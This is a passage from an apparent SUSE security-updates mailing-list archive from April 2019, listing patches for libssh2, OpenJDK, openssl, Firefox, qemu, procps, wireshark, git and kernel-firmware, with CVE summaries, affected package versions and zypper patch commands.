   - OpenStack Cloud Magnum Orchestration 7:

      zypper in -t patch SUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-1060=1

Package List:

   - SUSE OpenStack Cloud 7 (s390x x86_64):

      libssh2-1-1.4.3-20.6.1
      libssh2-1-32bit-1.4.3-20.6.1
      libssh2-1-debuginfo-1.4.3-20.6.1
      libssh2-1-debuginfo-32bit-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64):

      libssh2-devel-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64):

      libssh2-devel-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64):

      libssh2-1-1.4.3-20.6.1
      libssh2-1-debuginfo-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - SUSE Linux Enterprise Server for SAP 12-SP2 (x86_64):

      libssh2-1-32bit-1.4.3-20.6.1
      libssh2-1-debuginfo-32bit-1.4.3-20.6.1

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      libssh2-1-1.4.3-20.6.1
      libssh2-1-32bit-1.4.3-20.6.1
      libssh2-1-debuginfo-1.4.3-20.6.1
      libssh2-1-debuginfo-32bit-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64):

      libssh2-1-1.4.3-20.6.1
      libssh2-1-debuginfo-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64):

      libssh2-1-32bit-1.4.3-20.6.1
      libssh2-1-debuginfo-32bit-1.4.3-20.6.1

   - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64):

      libssh2-1-1.4.3-20.6.1
      libssh2-1-debuginfo-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64):

      libssh2-1-32bit-1.4.3-20.6.1
      libssh2-1-debuginfo-32bit-1.4.3-20.6.1

   - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64):
      libssh2-1-1.4.3-20.6.1
      libssh2-1-debuginfo-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - SUSE Linux Enterprise Server 12-SP2-LTSS (s390x x86_64):

      libssh2-1-32bit-1.4.3-20.6.1
      libssh2-1-debuginfo-32bit-1.4.3-20.6.1

   - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64):

      libssh2-1-1.4.3-20.6.1
      libssh2-1-32bit-1.4.3-20.6.1
      libssh2-1-debuginfo-1.4.3-20.6.1
      libssh2-1-debuginfo-32bit-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64):

      libssh2-1-1.4.3-20.6.1
      libssh2-1-debuginfo-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - SUSE Linux Enterprise Server 12-SP1-LTSS (s390x x86_64):

      libssh2-1-32bit-1.4.3-20.6.1
      libssh2-1-debuginfo-32bit-1.4.3-20.6.1

   - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64):

      libssh2-1-1.4.3-20.6.1
      libssh2-1-debuginfo-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - SUSE Linux Enterprise Server 12-LTSS (s390x x86_64):

      libssh2-1-32bit-1.4.3-20.6.1
      libssh2-1-debuginfo-32bit-1.4.3-20.6.1

   - SUSE Linux Enterprise Desktop 12-SP4 (x86_64):

      libssh2-1-1.4.3-20.6.1
      libssh2-1-32bit-1.4.3-20.6.1
      libssh2-1-debuginfo-1.4.3-20.6.1
      libssh2-1-debuginfo-32bit-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - SUSE Linux Enterprise Desktop 12-SP3 (x86_64):

      libssh2-1-1.4.3-20.6.1
      libssh2-1-32bit-1.4.3-20.6.1
      libssh2-1-debuginfo-1.4.3-20.6.1
      libssh2-1-debuginfo-32bit-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - SUSE Enterprise Storage 4 (x86_64):

      libssh2-1-1.4.3-20.6.1
      libssh2-1-32bit-1.4.3-20.6.1
      libssh2-1-debuginfo-1.4.3-20.6.1
      libssh2-1-debuginfo-32bit-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - SUSE CaaS Platform ALL (x86_64):

      libssh2-1-1.4.3-20.6.1
      libssh2-1-debuginfo-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - SUSE CaaS Platform 3.0 (x86_64):

      libssh2-1-1.4.3-20.6.1
      libssh2-1-debuginfo-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

   - OpenStack Cloud Magnum Orchestration 7 (x86_64):

      libssh2-1-1.4.3-20.6.1
      libssh2-1-debuginfo-1.4.3-20.6.1
      libssh2_org-debugsource-1.4.3-20.6.1

References:

   https://www.suse.com/security/cve/CVE-2019-3859.html
   https://bugzilla.suse.com/1130103
   https://bugzilla.suse.com/1133528

From sle-security-updates at lists.suse.com Sat Apr 27 07:10:50 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sat, 27 Apr 2019 15:10:50 +0200 (CEST)
Subject: SUSE-SU-2019:1059-1: important: Security update for libssh2_org
Message-ID: <20190427131050.3EE72F3D3@maintenance.suse.de>

   SUSE Security Update: Security update for libssh2_org
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:1059-1
Rating:             important
References:         #1130103 #1133528
Cross-References:   CVE-2019-3859
Affected Products:
                    SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

   An update that solves one vulnerability and has one errata is now available.

Description:

   This update for libssh2_org fixes the following issues:

   - Incorrect upstream fix for CVE-2019-3859 broke public key authentication
     [bsc#1133528, bsc#1130103]

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods
    like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Module for Basesystem 15:

      zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-1059=1

Package List:

   - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64):

      libssh2-1-1.8.0-4.6.1
      libssh2-1-debuginfo-1.8.0-4.6.1
      libssh2-devel-1.8.0-4.6.1
      libssh2_org-debugsource-1.8.0-4.6.1

References:

   https://www.suse.com/security/cve/CVE-2019-3859.html
   https://bugzilla.suse.com/1130103
   https://bugzilla.suse.com/1133528

From sle-security-updates at lists.suse.com Sat Apr 27 07:11:34 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sat, 27 Apr 2019 15:11:34 +0200 (CEST)
Subject: SUSE-SU-2019:14031-1: important: Security update for libssh2_org
Message-ID: <20190427131134.58C86F3D3@maintenance.suse.de>

   SUSE Security Update: Security update for libssh2_org
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:14031-1
Rating:             important
References:         #1091236 #1130103 #1133528
Cross-References:   CVE-2019-3859
Affected Products:
                    SUSE Linux Enterprise Server 11-SP4-LTSS
                    SUSE Linux Enterprise Debuginfo 11-SP4
______________________________________________________________________________

   An update that solves one vulnerability and has two fixes is now available.

Description:

   This update for libssh2_org fixes the following issues:

   - Incorrect upstream fix for CVE-2019-3859 broke public key authentication
     [bsc#1133528, bsc#1130103]
   - Store but don't use keys of unsupported types in the known_hosts file
     [bsc#1091236]

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods
    like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server 11-SP4-LTSS:

      zypper in -t patch slessp4-libssh2_org-14031=1

   - SUSE Linux Enterprise Debuginfo 11-SP4:

      zypper in -t patch dbgsp4-libssh2_org-14031=1

Package List:

   - SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64):

      libssh2-1-1.4.3-17.6.1

   - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64):

      libssh2_org-debuginfo-1.4.3-17.6.1
      libssh2_org-debugsource-1.4.3-17.6.1

References:

   https://www.suse.com/security/cve/CVE-2019-3859.html
   https://bugzilla.suse.com/1091236
   https://bugzilla.suse.com/1130103
   https://bugzilla.suse.com/1133528

From sle-security-updates at lists.suse.com Sat Apr 27 16:09:00 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:09:00 +0200 (CEST)
Subject: SUSE-SU-2019:0057-2: important: Security update for java-1_8_0-openjdk
Message-ID: <20190427220900.F36ADF3D3@maintenance.suse.de>

   SUSE Security Update: Security update for java-1_8_0-openjdk
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0057-2
Rating:             important
References:         #1112142 #1112143 #1112144 #1112146 #1112147 #1112148
                    #1112152 #1112153
Cross-References:   CVE-2018-13785 CVE-2018-16435 CVE-2018-3136 CVE-2018-3139
                    CVE-2018-3149 CVE-2018-3169 CVE-2018-3180 CVE-2018-3183
                    CVE-2018-3214
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes 9 vulnerabilities is now available.
Description:

   This update for java-1_8_0-openjdk to version 8u191 fixes the following issues:

   Security issues fixed:

   - CVE-2018-3136: Manifest better support (bsc#1112142)
   - CVE-2018-3139: Better HTTP Redirection (bsc#1112143)
   - CVE-2018-3149: Enhance JNDI lookups (bsc#1112144)
   - CVE-2018-3169: Improve field accesses (bsc#1112146)
   - CVE-2018-3180: Improve TLS connections stability (bsc#1112147)
   - CVE-2018-3214: Better RIFF reading support (bsc#1112152)
   - CVE-2018-13785: Upgrade JDK 8u to libpng 1.6.35 (bsc#1112153)
   - CVE-2018-3183: Improve script engine support (bsc#1112148)
   - CVE-2018-16435: heap-based buffer overflow in SetData function in
     cmsIT8LoadFromFile

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods
    like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-57=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      java-1_8_0-openjdk-1.8.0.191-27.29.1
      java-1_8_0-openjdk-debuginfo-1.8.0.191-27.29.1
      java-1_8_0-openjdk-debugsource-1.8.0.191-27.29.1
      java-1_8_0-openjdk-demo-1.8.0.191-27.29.1
      java-1_8_0-openjdk-demo-debuginfo-1.8.0.191-27.29.1
      java-1_8_0-openjdk-devel-1.8.0.191-27.29.1
      java-1_8_0-openjdk-headless-1.8.0.191-27.29.1
      java-1_8_0-openjdk-headless-debuginfo-1.8.0.191-27.29.1

References:

   https://www.suse.com/security/cve/CVE-2018-13785.html
   https://www.suse.com/security/cve/CVE-2018-16435.html
   https://www.suse.com/security/cve/CVE-2018-3136.html
   https://www.suse.com/security/cve/CVE-2018-3139.html
   https://www.suse.com/security/cve/CVE-2018-3149.html
   https://www.suse.com/security/cve/CVE-2018-3169.html
   https://www.suse.com/security/cve/CVE-2018-3180.html
   https://www.suse.com/security/cve/CVE-2018-3183.html
   https://www.suse.com/security/cve/CVE-2018-3214.html
   https://bugzilla.suse.com/1112142
   https://bugzilla.suse.com/1112143
   https://bugzilla.suse.com/1112144
   https://bugzilla.suse.com/1112146
   https://bugzilla.suse.com/1112147
   https://bugzilla.suse.com/1112148
   https://bugzilla.suse.com/1112152
   https://bugzilla.suse.com/1112153

From sle-security-updates at lists.suse.com Sat Apr 27 16:10:55 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:10:55 +0200 (CEST)
Subject: SUSE-SU-2019:0427-2: important: Security update for kernel-firmware
Message-ID: <20190427221055.69FA6F3D3@maintenance.suse.de>

   SUSE Security Update: Security update for kernel-firmware
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0427-2
Rating:             important
References:         #1104301
Cross-References:   CVE-2018-5383
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes one vulnerability is now available.

Description:

   This update for kernel-firmware fixes the following issues:

   Security issue fixed:

   - CVE-2018-5383: Fixed an implementation issue in Bluetooth where the
     elliptic curve parameters were not sufficiently validated during
     Diffie-Hellman key exchange (bsc#1104301).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods
    like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-427=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch):

      kernel-firmware-20160516git-10.16.1
      ucode-amd-20160516git-10.16.1

References:

   https://www.suse.com/security/cve/CVE-2018-5383.html
   https://bugzilla.suse.com/1104301

From sle-security-updates at lists.suse.com Sat Apr 27 16:11:33 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:11:33 +0200 (CEST)
Subject: SUSE-SU-2018:3749-3: important: Security update for MozillaFirefox
Message-ID: <20190427221133.BD9EAF3D3@maintenance.suse.de>

   SUSE Security Update: Security update for MozillaFirefox
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:3749-3
Rating:             important
References:         #1112852
Cross-References:   CVE-2018-12389 CVE-2018-12390 CVE-2018-12392 CVE-2018-12393
                    CVE-2018-12395 CVE-2018-12396 CVE-2018-12397
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes 7 vulnerabilities is now available.

Description:

   This update for MozillaFirefox fixes the following issues:

   Security issues fixed:

   - Update to Mozilla Firefox 60.3.0esr: MFSA 2018-27 (bsc#1112852)
     - CVE-2018-12392: Crash with nested event loops.
     - CVE-2018-12393: Integer overflow during Unicode conversion while
       loading JavaScript.
     - CVE-2018-12395: WebExtension bypass of domain restrictions through
       header rewriting.
     - CVE-2018-12396: WebExtension content scripts can execute in disallowed
       contexts.
     - CVE-2018-12397: WebExtension local file access vulnerability.
     - CVE-2018-12389: Memory safety bugs fixed in Firefox ESR 60.3.
     - CVE-2018-12390: Memory safety bugs fixed in Firefox 63 and Firefox ESR 60.3.
Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods
    like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1079=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      MozillaFirefox-60.3.0-109.50.2
      MozillaFirefox-debuginfo-60.3.0-109.50.2
      MozillaFirefox-debugsource-60.3.0-109.50.2
      MozillaFirefox-devel-60.3.0-109.50.2
      MozillaFirefox-translations-common-60.3.0-109.50.2

References:

   https://www.suse.com/security/cve/CVE-2018-12389.html
   https://www.suse.com/security/cve/CVE-2018-12390.html
   https://www.suse.com/security/cve/CVE-2018-12392.html
   https://www.suse.com/security/cve/CVE-2018-12393.html
   https://www.suse.com/security/cve/CVE-2018-12395.html
   https://www.suse.com/security/cve/CVE-2018-12396.html
   https://www.suse.com/security/cve/CVE-2018-12397.html
   https://bugzilla.suse.com/1112852

From sle-security-updates at lists.suse.com Sat Apr 27 16:12:16 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:12:16 +0200 (CEST)
Subject: SUSE-SU-2018:3864-2: moderate: Security update for openssl
Message-ID: <20190427221216.312CFF3D3@maintenance.suse.de>

   SUSE Security Update: Security update for openssl
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:3864-2
Rating:             moderate
References:         #1101470 #1104789 #1106197 #1110018 #1113534 #1113652
Cross-References:   CVE-2016-8610 CVE-2018-0734 CVE-2018-0737 CVE-2018-5407
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that solves four vulnerabilities and has two fixes is now available.
Description:

   This update for openssl fixes the following issues:

   Security issues fixed:

   - CVE-2018-0734: Fixed timing vulnerability in DSA signature generation
     (bsc#1113652).
   - CVE-2018-5407: Fixed elliptic curve scalar multiplication timing attack
     defenses (bsc#1113534).
   - CVE-2018-0737: Corrected the error detection of the current fix
     (bsc#1106197).
   - CVE-2016-8610: Adjusted the current fix and added the missing error string
     (bsc#1110018).
   - Added the missing timing side channel patch for DSA signature generation
     (bsc#1113742).
   - Fixed the "One and Done" side-channel attack on RSA (bsc#1104789).

   Non-security issues fixed:

   - Added openssl(cli) so that the packages that required the openssl binary
     can require this instead of the new openssl meta package (bsc#1101470).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods
    like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1063=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      libopenssl1_0_0-1.0.1i-54.20.1
      libopenssl1_0_0-32bit-1.0.1i-54.20.1
      libopenssl1_0_0-debuginfo-1.0.1i-54.20.1
      libopenssl1_0_0-debuginfo-32bit-1.0.1i-54.20.1
      libopenssl1_0_0-hmac-1.0.1i-54.20.1
      libopenssl1_0_0-hmac-32bit-1.0.1i-54.20.1
      openssl-1.0.1i-54.20.1
      openssl-debuginfo-1.0.1i-54.20.1
      openssl-debugsource-1.0.1i-54.20.1

   - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch):

      openssl-doc-1.0.1i-54.20.1

References:

   https://www.suse.com/security/cve/CVE-2016-8610.html
   https://www.suse.com/security/cve/CVE-2018-0734.html
   https://www.suse.com/security/cve/CVE-2018-0737.html
   https://www.suse.com/security/cve/CVE-2018-5407.html
   https://bugzilla.suse.com/1101470
   https://bugzilla.suse.com/1104789
   https://bugzilla.suse.com/1106197
   https://bugzilla.suse.com/1110018
   https://bugzilla.suse.com/1113534
   https://bugzilla.suse.com/1113652

From sle-security-updates at lists.suse.com Sat Apr 27 16:13:55 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:13:55 +0200 (CEST)
Subject: SUSE-SU-2019:0450-2: important: Security update for procps
Message-ID: <20190427221355.98C44F3D3@maintenance.suse.de>

   SUSE Security Update: Security update for procps
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0450-2
Rating:             important
References:         #1092100 #1121753
Cross-References:   CVE-2018-1122 CVE-2018-1123 CVE-2018-1124 CVE-2018-1125
                    CVE-2018-1126
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes 5 vulnerabilities is now available.

Description:

   This update for procps fixes the following security issues:

   - CVE-2018-1122: Prevent local privilege escalation in top. If a user ran
     top with HOME unset in an attacker-controlled directory, the attacker
     could have achieved privilege escalation by exploiting one of several
     vulnerabilities in the config_file() function (bsc#1092100).
   - CVE-2018-1123: Prevent denial of service in ps via mmap buffer overflow.
     Inbuilt protection in ps mapped a guard page at the end of the overflowed
     buffer, ensuring that the impact of this flaw is limited to a crash
     (temporary denial of service) (bsc#1092100).
   - CVE-2018-1124: Prevent multiple integer overflows leading to a heap
     corruption in the file2strvec function. This allowed a privilege
     escalation for a local attacker who can create entries in procfs by
     starting processes, which could result in crashes or arbitrary code
     execution in proc utilities run by other users (bsc#1092100).
   - CVE-2018-1125: Prevent stack buffer overflow in pgrep. This vulnerability
     was mitigated by FORTIFY, limiting the impact to a crash (bsc#1092100).
   - CVE-2018-1126: Ensure correct integer size in proc/alloc.* to prevent
     truncation/integer overflow issues (bsc#1092100).

   (These issues were previously released for SUSE Linux Enterprise 12 SP3 and SP4.)

   Also the following non-security issue was fixed:

   - Fix CPU summary showing old data. (bsc#1121753)

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods
    like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-450=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      libprocps3-3.3.9-11.18.1
      libprocps3-debuginfo-3.3.9-11.18.1
      procps-3.3.9-11.18.1
      procps-debuginfo-3.3.9-11.18.1
      procps-debugsource-3.3.9-11.18.1

References:

   https://www.suse.com/security/cve/CVE-2018-1122.html
   https://www.suse.com/security/cve/CVE-2018-1123.html
   https://www.suse.com/security/cve/CVE-2018-1124.html
   https://www.suse.com/security/cve/CVE-2018-1125.html
   https://www.suse.com/security/cve/CVE-2018-1126.html
   https://bugzilla.suse.com/1092100
   https://bugzilla.suse.com/1121753

From sle-security-updates at lists.suse.com Sat Apr 27 16:15:03 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:15:03 +0200 (CEST)
Subject: SUSE-SU-2019:0471-2: important: Security update for qemu
Message-ID: <20190427221503.10F63F3D3@maintenance.suse.de>

   SUSE Security Update: Security update for qemu
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0471-2
Rating:             important
References:         #1116717 #1117275 #1119493 #1123156
Cross-References:   CVE-2018-16872 CVE-2018-19364 CVE-2018-19489 CVE-2019-6778
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes four vulnerabilities is now available.

Description:

   This update for qemu fixes the following issues:

   Security issues fixed:

   - CVE-2019-6778: Fixed a heap buffer overflow issue in the SLiRP networking
     implementation (bsc#1123156).
   - CVE-2018-16872: Fixed a host security vulnerability related to handling
     symlinks in usb-mtp (bsc#1119493).
   - CVE-2018-19489: Fixed a denial of service vulnerability in virtfs
     (bsc#1117275).
   - CVE-2018-19364: Fixed a use-after-free in the virtfs interface resulting
     in a denial of service (bsc#1116717).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods
    like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-471=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      qemu-2.3.1-33.20.1
      qemu-block-curl-2.3.1-33.20.1
      qemu-block-curl-debuginfo-2.3.1-33.20.1
      qemu-block-rbd-2.3.1-33.20.1
      qemu-block-rbd-debuginfo-2.3.1-33.20.1
      qemu-debugsource-2.3.1-33.20.1
      qemu-guest-agent-2.3.1-33.20.1
      qemu-guest-agent-debuginfo-2.3.1-33.20.1
      qemu-kvm-2.3.1-33.20.1
      qemu-lang-2.3.1-33.20.1
      qemu-tools-2.3.1-33.20.1
      qemu-tools-debuginfo-2.3.1-33.20.1
      qemu-x86-2.3.1-33.20.1

   - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch):

      qemu-ipxe-1.0.0-33.20.1
      qemu-seabios-1.8.1-33.20.1
      qemu-sgabios-8-33.20.1
      qemu-vgabios-1.8.1-33.20.1

References:

   https://www.suse.com/security/cve/CVE-2018-16872.html
   https://www.suse.com/security/cve/CVE-2018-19364.html
   https://www.suse.com/security/cve/CVE-2018-19489.html
   https://www.suse.com/security/cve/CVE-2019-6778.html
   https://bugzilla.suse.com/1116717
   https://bugzilla.suse.com/1117275
   https://bugzilla.suse.com/1119493
   https://bugzilla.suse.com/1123156

From sle-security-updates at lists.suse.com Sat Apr 27 16:16:06 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:16:06 +0200 (CEST)
Subject: SUSE-SU-2018:3590-3: important: Security update for wireshark
Message-ID: <20190427221606.D2333F3D3@maintenance.suse.de>

   SUSE Security Update: Security update for wireshark
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:3590-3
Rating:             important
References:         #1111647
Cross-References:   CVE-2018-12086 CVE-2018-18227
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes two vulnerabilities is now available.

Description:

   This update for wireshark fixes the following issues:

   Wireshark was updated to 2.4.10 (bsc#1111647).

   The following security issues were fixed:

   - CVE-2018-18227: MS-WSP dissector crash (wnpa-sec-2018-47)
   - CVE-2018-12086: OpcUA dissector crash (wnpa-sec-2018-50)

   Further bug fixes and updated protocol support are listed in:
   https://www.wireshark.org/docs/relnotes/wireshark-2.4.10.html

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods
    like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1067=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      libwireshark9-2.4.10-48.32.1
      libwireshark9-debuginfo-2.4.10-48.32.1
      libwiretap7-2.4.10-48.32.1
      libwiretap7-debuginfo-2.4.10-48.32.1
      libwscodecs1-2.4.10-48.32.1
      libwscodecs1-debuginfo-2.4.10-48.32.1
      libwsutil8-2.4.10-48.32.1
      libwsutil8-debuginfo-2.4.10-48.32.1
      wireshark-2.4.10-48.32.1
      wireshark-debuginfo-2.4.10-48.32.1
      wireshark-debugsource-2.4.10-48.32.1
      wireshark-gtk-2.4.10-48.32.1
      wireshark-gtk-debuginfo-2.4.10-48.32.1

References:

   https://www.suse.com/security/cve/CVE-2018-12086.html
   https://www.suse.com/security/cve/CVE-2018-18227.html
   https://bugzilla.suse.com/1111647

From sle-security-updates at lists.suse.com Sat Apr 27 16:16:44 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:16:44 +0200 (CEST)
Subject: SUSE-SU-2018:4088-2: important: Security update for git
Message-ID: <20190427221644.D1C0CF3D3@maintenance.suse.de>

   SUSE Security Update: Security update for git
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:4088-2
Rating:             important
References:         #1110949
Cross-References:   CVE-2018-17456
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes one vulnerability is now available.

Description:

   This update for git fixes the following issue:

   - CVE-2018-17456: Git allowed remote code execution during processing of a
     recursive "git clone" of a superproject if a .gitmodules file has a URL
     field beginning with a '-' character (boo#1110949).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods
    like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1073=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch):

      git-doc-2.12.3-27.17.2

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      git-core-2.12.3-27.17.2
      git-core-debuginfo-2.12.3-27.17.2
      git-debugsource-2.12.3-27.17.2

References:

   https://www.suse.com/security/cve/CVE-2018-17456.html
   https://bugzilla.suse.com/1110949

From sle-security-updates at lists.suse.com Sat Apr 27 16:17:26 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:17:26 +0200 (CEST)
Subject: SUSE-SU-2018:3064-3: important: Security update for java-1_8_0-openjdk
Message-ID: <20190427221726.E9321F3D3@maintenance.suse.de>

   SUSE Security Update: Security update for java-1_8_0-openjdk
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:3064-3
Rating:             important
References:         #1101644 #1101645 #1101651 #1101656 #1106812
Cross-References:   CVE-2018-2938 CVE-2018-2940 CVE-2018-2952 CVE-2018-2973
                    CVE-2018-3639
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes 5 vulnerabilities is now available.

Description:

   This update for java-1_8_0-openjdk to the jdk8u181 (icedtea 3.9.0) release
   fixes the following issues:

   These security issues were fixed:

   - CVE-2018-2938: Difficult to exploit vulnerability allowed unauthenticated
     attacker with network access via multiple protocols to compromise Java SE.
     Successful attacks of this vulnerability can result in takeover of Java SE
     (bsc#1101644).
   - CVE-2018-2940: Vulnerability in subcomponent: Libraries. Easily
     exploitable vulnerability allowed unauthenticated attacker with network
     access via multiple protocols to compromise Java SE, Java SE Embedded.
     Successful attacks require human interaction from a person other than the
     attacker. Successful attacks of this vulnerability can result in
     unauthorized read access to a subset of Java SE, Java SE Embedded
     accessible data (bsc#1101645)
   - CVE-2018-2952: Vulnerability in subcomponent: Concurrency. Difficult to
     exploit vulnerability allowed unauthenticated attacker with network access
     via multiple protocols to compromise Java SE, Java SE Embedded, JRockit.
     Successful attacks of this vulnerability can result in unauthorized ability
     to cause a partial denial of service (partial DOS) of Java SE, Java SE
     Embedded, JRockit (bsc#1101651)
   - CVE-2018-2973: Vulnerability in subcomponent: JSSE. Difficult to exploit
     vulnerability allowed unauthenticated attacker with network access via
     SSL/TLS to compromise Java SE, Java SE Embedded. Successful attacks of this
     vulnerability can result in unauthorized creation, deletion or modification
     access to critical data or all Java SE, Java SE Embedded accessible data
     (bsc#1101656)

   These non-security issues were fixed:

   - Improve desktop file usage
   - Better Internet address support
   - speculative traps break when classes are redefined
   - sun/security/pkcs11/ec/ReadCertificates.java fails intermittently
